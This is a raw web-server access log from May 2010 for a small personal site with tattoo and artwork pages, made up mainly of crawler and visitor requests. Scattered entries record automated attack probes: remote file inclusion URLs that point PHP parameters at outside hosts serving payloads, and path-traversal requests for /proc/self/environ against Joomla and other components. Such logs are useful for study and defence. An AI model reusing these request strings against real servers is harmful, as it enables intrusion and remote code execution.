77.222.56.62 - - [06/May/2010:15:15:59 -0500] "GET /logs/access_log.1272067200//index1.php?choix=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
77.222.56.62 - - [06/May/2010:15:15:59 -0500] "GET //index1.php?choix=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
77.222.56.62 - - [06/May/2010:15:16:00 -0500] "GET /logs//index1.php?choix=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
67.195.112.180 - - [06/May/2010:15:17:19 -0500] "GET /artwork/index.htm HTTP/1.0" 200 11078 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [06/May/2010:15:20:17 -0500] "GET /logs/access_log.1208131200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.249.71.205 - - [06/May/2010:15:24:17 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
87.250.255.243 - - [06/May/2010:15:33:08 -0500] "GET /logs/access_log.1220659200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [06/May/2010:15:37:34 -0500] "GET /artwork/menorahs.htm HTTP/1.0" 200 1007 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.231 - - [06/May/2010:15:39:51 -0500] "GET /logs/access_log.1255046400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.94.188 - - [06/May/2010:15:39:58 -0500] "GET /solpot.html?body=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:15:39:58 -0500] "GET /logs/access_log.1265500800/solpot.html?body=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:15:39:58 -0500] "GET /logs/solpot.html?body=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:15:39:58 -0500] "GET /logs/access_log.1265673600/solpot.html?body=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:15:40:09 -0500] "GET /logs/solpot.html?body=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:15:40:09 -0500] "GET /logs/access_log.1265673600/solpot.html?body=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:15:40:09 -0500] "GET /logs/access_log.1265500800/solpot.html?body=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:15:40:09 -0500] "GET /solpot.html?body=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
174.142.68.135 - - [06/May/2010:15:41:24 -0500] "GET /logs/?sourcedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4495 "-""libwww-perl/5.834"
174.142.68.135 - - [06/May/2010:15:41:24 -0500] "GET /?sourcedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
24.162.100.112 - - [06/May/2010:15:44:14 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:14 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:14 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:14 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:14 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:14 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:14 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:14 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:14 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:14 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:14 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:14 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:15 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:15 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:15 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:15 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:15 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:15 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:15 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:15 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:15 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:15 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:15 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:15 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:15 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:15 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
24.162.100.112 - - [06/May/2010:15:44:15 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://www.12ozprophet.com/forum/showthread.php?p=7038540""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)"
125.244.25.10 - - [06/May/2010:15:44:42 -0500] "GET /http://moncrot.justfree.com/idourcrew.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
207.46.204.191 - - [06/May/2010:15:45:51 -0500] "GET /logs/access_log.1185321600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [06/May/2010:15:45:59 -0500] "GET /logs/access_log.1254268800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.43 - - [06/May/2010:15:46:51 -0500] "GET /logs/access_log.1183334400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [06/May/2010:15:53:42 -0500] "GET /tattoo/set2.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
63.147.127.171 - - [06/May/2010:15:53:46 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
63.147.127.171 - - [06/May/2010:15:53:46 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
63.147.127.171 - - [06/May/2010:15:53:46 -0500] "GET /logs/access_log.1272067200/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
207.46.204.232 - - [06/May/2010:16:00:22 -0500] "GET /logs/access_log.1156291200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.94.188 - - [06/May/2010:16:01:57 -0500] "GET /dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:16:01:57 -0500] "GET /logs/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:16:01:57 -0500] "GET /logs/access_log.1270598400%20%20/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 385 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:16:02:09 -0500] "GET /dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:16:02:09 -0500] "GET /logs/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:16:02:09 -0500] "GET /logs/access_log.1270598400%20%20/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 385 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:16:02:42 -0500] "GET /logs/access_log.1218412800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.179 - - [06/May/2010:16:03:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.94.188 - - [06/May/2010:16:03:32 -0500] "GET /logs/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:16:03:32 -0500] "GET /dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:16:03:35 -0500] "GET /logs/access_log.1270598400/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 383 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:16:03:42 -0500] "GET /dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:16:03:42 -0500] "GET /logs/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:16:03:42 -0500] "GET /logs/access_log.1270598400/dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 383 "-""Mozilla/5.0"
216.129.119.13 - - [06/May/2010:16:07:17 -0500] "GET /logs/access_log.1239926400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.195.112.180 - - [06/May/2010:16:11:13 -0500] "GET /logs/access_log.1215302400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [06/May/2010:16:11:42 -0500] "GET /logs/access_log.1221955200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
213.172.38.2 - - [06/May/2010:16:15:29 -0500] "GET /logs/access_log.1268956800/?sourcedir=http://www.dvhrunners.co.kr//bbs//data/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
213.172.38.2 - - [06/May/2010:16:15:29 -0500] "GET /logs/?sourcedir=http://www.dvhrunners.co.kr//bbs//data/id1.txt?? HTTP/1.1" 200 4495 "-""Mozilla/5.0"
213.172.38.2 - - [06/May/2010:16:15:29 -0500] "GET /?sourcedir=http://www.dvhrunners.co.kr//bbs//data/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
67.195.112.180 - - [06/May/2010:16:19:22 -0500] "GET /logs/access_log.1193702400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [06/May/2010:16:19:47 -0500] "GET /logs/access_log.1236643200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [06/May/2010:16:23:17 -0500] "GET /logs/access_log.1269216000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [06/May/2010:16:34:53 -0500] "GET /logs/access_log.1216425600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [06/May/2010:16:42:36 -0500] "GET /logs/access_log.1268956800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [06/May/2010:16:43:05 -0500] "GET /logs/access_log.1253404800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.154.192.56 - - [06/May/2010:16:50:21 -0500] "GET //skin/zero_vote/error.php?dir=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 309 "-""libwww-perl/5.834"
212.154.192.56 - - [06/May/2010:16:50:22 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 314 "-""libwww-perl/5.834"
77.222.56.62 - - [06/May/2010:16:51:07 -0500] "GET //htmltonuke.php?filnavn=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.250.255.243 - - [06/May/2010:16:51:36 -0500] "GET /logs/access_log.1252800000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [06/May/2010:16:57:36 -0500] "GET /logs/access_log.1245283200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.43 - - [06/May/2010:16:58:19 -0500] "GET /logs/access_log.1266451200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
200.62.142.217 - - [06/May/2010:17:01:03 -0500] "GET /logs/?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4495 "-""libwww-perl/5.805"
200.62.142.217 - - [06/May/2010:17:01:04 -0500] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
87.250.255.243 - - [06/May/2010:17:05:22 -0500] "GET /logs/access_log.1237680000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
200.62.142.217 - - [06/May/2010:17:12:51 -0500] "GET //includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
200.62.142.217 - - [06/May/2010:17:12:52 -0500] "GET /logs//includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
187.45.193.159 - - [06/May/2010:17:12:55 -0500] "GET /logs//pcltar.php?g_pcltar_lib_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
200.62.142.217 - - [06/May/2010:17:12:56 -0500] "GET /logs/access_log.1266364800//includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
187.45.193.159 - - [06/May/2010:17:13:01 -0500] "GET //pcltar.php?g_pcltar_lib_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
64.120.126.77 - - [06/May/2010:17:16:11 -0500] "HEAD /costume/ HTTP/1.1" 200 0 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
207.46.204.180 - - [06/May/2010:17:16:52 -0500] "GET /logs/access_log.1165968000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [06/May/2010:17:18:14 -0500] "GET /logs/access_log.1201392000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
77.222.56.62 - - [06/May/2010:17:24:58 -0500] "GET /logs/access_log.1270857600//htmltonuke.php?filnavn=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
77.222.56.62 - - [06/May/2010:17:24:58 -0500] "GET //htmltonuke.php?filnavn=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.222.56.62 - - [06/May/2010:17:24:59 -0500] "GET /logs//htmltonuke.php?filnavn=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
216.7.185.19 - - [06/May/2010:17:25:35 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
216.7.185.19 - - [06/May/2010:17:25:35 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
216.7.185.19 - - [06/May/2010:17:25:35 -0500] "GET /logs/access_log.1272067200/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
216.7.185.19 - - [06/May/2010:17:26:49 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
216.7.185.19 - - [06/May/2010:17:26:49 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
216.7.185.19 - - [06/May/2010:17:26:49 -0500] "GET /logs/access_log.1272067200/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
87.250.255.243 - - [06/May/2010:17:28:31 -0500] "GET /logs/access_log.1245715200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.167.14.41 - - [06/May/2010:17:32:14 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.it/search?q=vintagel+tatoo&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:it:official&client=firefox-a""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
94.167.14.41 - - [06/May/2010:17:32:15 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
